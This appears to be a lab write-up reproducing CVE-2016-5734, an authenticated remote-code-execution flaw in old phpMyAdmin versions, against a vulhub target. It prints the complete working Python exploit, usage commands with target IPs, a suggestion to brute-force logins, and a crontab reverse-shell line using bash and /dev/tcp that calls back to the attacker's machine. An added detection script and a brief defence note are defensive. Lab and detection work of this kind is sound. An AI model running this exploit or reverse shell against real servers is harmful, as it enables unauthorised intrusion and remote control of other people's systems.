CVE-2016-5734 remote command execution vulnerability
Environment:
Target:
System: CentOS 7 (vulhub)
IP: 192.168.21.23
Kali machine:
System: Debian 10
IP: 192.168.21.33
Vulnerability description:
On exploit-db, CVE-2016-5734 is listed as "phpMyAdmin 4.6.2 - Authenticated Remote Code Execution", i.e. remote code execution by an authenticated phpMyAdmin user. According to the description, all phpMyAdmin 4.6.x versions (prior to 4.6.3), 4.4.x versions (prior to 4.4.15.7) and 4.0.x versions (prior to 4.0.10.16) are affected. The author of the exploit abuses a bug in how the preg_replace function handles null bytes in PHP versions before 5.4.7, so that injected code is executed remotely.
Affected versions:
phpMyAdmin 4.6.x (prior to 4.6.3)
phpMyAdmin 4.4.x (prior to 4.4.15.7)
phpMyAdmin 4.0.x (prior to 4.0.10.16)
PHP version: 4.3.0 ~ 5.4.6
Port: 8080
Start the vulhub environment:
phpMyAdmin 4.4.15.6
Home page:
Procedure:
- Port scan
Ports 22 and 8080 are open.
22 is my MobaXterm session, so we visit 8080:
192.168.21.23:8080
- The page on 8080 requires an account and password to log in (the precondition for this vulnerability is that we know a valid username and password).
Brute forcing can be used here, and it generally succeeds.
- PoC

```python
#!/usr/bin/env python
"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""

import requests
import argparse
import sys

__author__ = "@iamsecurity"

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("url", type=str, help="URL with path to PMA")
    parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
    parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
    parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
    parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")
    parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")
    arguments = parser.parse_args()
    url_to_pma = arguments.url
    uname = arguments.user
    upass = arguments.pwd
    if arguments.dbs:
        db = arguments.dbs
    else:
        db = "test"
    token = False
    custom_table = False
    if arguments.table:
        custom_table = True
        table = arguments.table
    else:
        table = "prgpwn"
    if arguments.cmd:
        payload = arguments.cmd
    else:
        payload = "system('uname -a');"

    size = 32
    s = requests.Session()
    # you can manually add proxy support it's very simple ;)
    # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
    s.verify = False
    # the stored value is "0/e\0"; the find pattern below must match it
    sql = '''CREATE TABLE `{0}` (
  `first` varchar(10) CHARACTER SET utf8 NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
'''.format(table)

    # get_token
    resp = s.post(url_to_pma + "/?lang=en", dict(
        pma_username=uname,
        pma_password=upass
    ))
    # compare with ==, not "is" (identity comparison on ints is a bug)
    if resp.status_code == 200:
        token_place = resp.text.find("token=") + 6
        token = resp.text[token_place:token_place + 32]
    if token is False:
        print("Cannot get valid authorization token.")
        sys.exit(1)

    if custom_table is False:
        data = {
            "is_js_confirmed": "0",
            "db": db,
            "token": token,
            "pos": "0",
            "sql_query": sql,
            "sql_delimiter": ";",
            "show_query": "0",
            "fk_checks": "0",
            "SQL": "Go",
            "ajax_request": "true",
            "ajax_page_request": "true",
        }
        resp = s.post(url_to_pma + "/import.php", data,
                      cookies=requests.utils.dict_from_cookiejar(s.cookies))
        if resp.status_code == 200:
            if "success" in resp.json():
                if resp.json()["success"] is False:
                    first = resp.json()["error"][resp.json()["error"].find("<code>") + 6:]
                    error = first[:first.find("</code>")]
                    if "already exists" in error:
                        print(error)
                    else:
                        print("ERROR: " + error)
                        sys.exit(1)

    # build exploit
    exploit = {
        "db": db,
        "table": table,
        "token": token,
        "goto": "sql.php",
        "find": "0/e\0",
        "replaceWith": payload,
        "columnIndex": "0",
        "useRegex": "on",
        "submit": "Go",
        "ajax_request": "true"
    }
    resp = s.post(
        url_to_pma + "/tbl_find_replace.php", exploit,
        cookies=requests.utils.dict_from_cookiejar(s.cookies)
    )
    if resp.status_code == 200:
        result = resp.json()["message"][resp.json()["message"].find("</a>") + 8:]
        if len(result):
            print("result: " + result)
            sys.exit(0)
    print(
        "Exploit failed!\n"
        "Try to manually set exploit parameters like --table, --database and --token.\n"
        "Remember that servers with PHP version greater than 5.4.6"
        " is not exploitable, because of warning about null byte in regexp"
    )
    sys.exit(1)
```
Kali also ships with some phpMyAdmin exploits that can be used.
- Using the PoC:
Usage:
-u account, -p password, -c code to execute (PHP code); uname -a is executed by default.
python CVE-2016-5734_poc.py -u root -p root http://192.168.13.131:8080
- Running commands with the exploit
python CVE-2016-5734_poc.py -u root -p root -c "system('id')" http://192.168.21.23:8080
Viewing sensitive directories:
Creating files:
Defence: update the PHP version promptly (and move phpMyAdmin past the affected releases listed above).
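For the detection side, here is an added example (not part of the original write-up) that flags find/replace requests carrying the signature the PoC above sends: a POST to tbl_find_replace.php with useRegex=on and a null byte inside the find parameter. The request records are constructed inline in a simple "METHOD PATH<TAB>BODY" format, as a WAF or reverse proxy might log them; that format is an assumption of this example.

```python
"""Flag phpMyAdmin find/replace requests matching the CVE-2016-5734 pattern."""
from urllib.parse import parse_qs, urlsplit

# Constructed sample records: a benign regex replace, a request shaped like
# the PoC (find=0/e followed by %00), and an unrelated import request.
SAMPLE_REQUESTS = [
    "POST /tbl_find_replace.php\tdb=test&table=users&find=foo&replaceWith=bar&useRegex=on&submit=Go",
    "POST /tbl_find_replace.php\tdb=test&table=prgpwn&find=0%2Fe%00&replaceWith=system%28%27id%27%29%3B"
    "&columnIndex=0&useRegex=on&submit=Go",
    "POST /import.php\tdb=test&sql_query=SELECT+1",
]


def parse_record(record):
    """Split a 'METHOD PATH<TAB>BODY' record into (path, decoded form fields)."""
    request_line, _, body = record.partition("\t")
    _, _, target = request_line.partition(" ")
    path = urlsplit(target).path
    fields = parse_qs(body, keep_blank_values=True)  # %00 decodes to "\x00"
    return path, {name: values[0] for name, values in fields.items()}


def classify(path, fields):
    """Return a short reason when the request matches the signature, else None."""
    if not path.endswith("/tbl_find_replace.php"):
        return None
    if fields.get("useRegex", "").lower() != "on":
        return None
    find = fields.get("find", "")
    if "\x00" not in find:
        return None
    # On PHP < 5.4.7 the pattern string is cut at the null byte, so the text
    # before it ("0/e" in the PoC) is read as closing delimiter plus modifiers,
    # and the "e" modifier makes preg_replace() eval() the replaceWith value.
    head = find.split("\x00", 1)[0]
    if "/e" in head:
        return "null byte after /e modifier in regex find (CVE-2016-5734 pattern)"
    return "null byte in regex find"


def scan(records):
    """Return (index, reason) for every record that matches the signature."""
    hits = []
    for index, record in enumerate(records):
        reason = classify(*parse_record(record))
        if reason:
            hits.append((index, reason))
    return hits
```

Only the second sample record is reported; a plain "/e" without a null byte is a legitimate search string and is not flagged.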
To sum up: although this is a command execution vulnerability, when I checked the permissions it seemed I could only view files, create files and write some content into them. file_put_contents('filename','content'); can be used to write content, but during my testing even a complex one-line webshell still got filtered out.
I think a reverse shell command could be written, but this lab has no at or crontab components, so I won't try it for now.
Reverse shell code: '* * * * * bash -i >& /dev/tcp/192.168.21.33/4444 0>&1'
It would definitely work ✍
I went and tried it afterwards, and only then found out that I really don't have at or crontab scheduled tasks.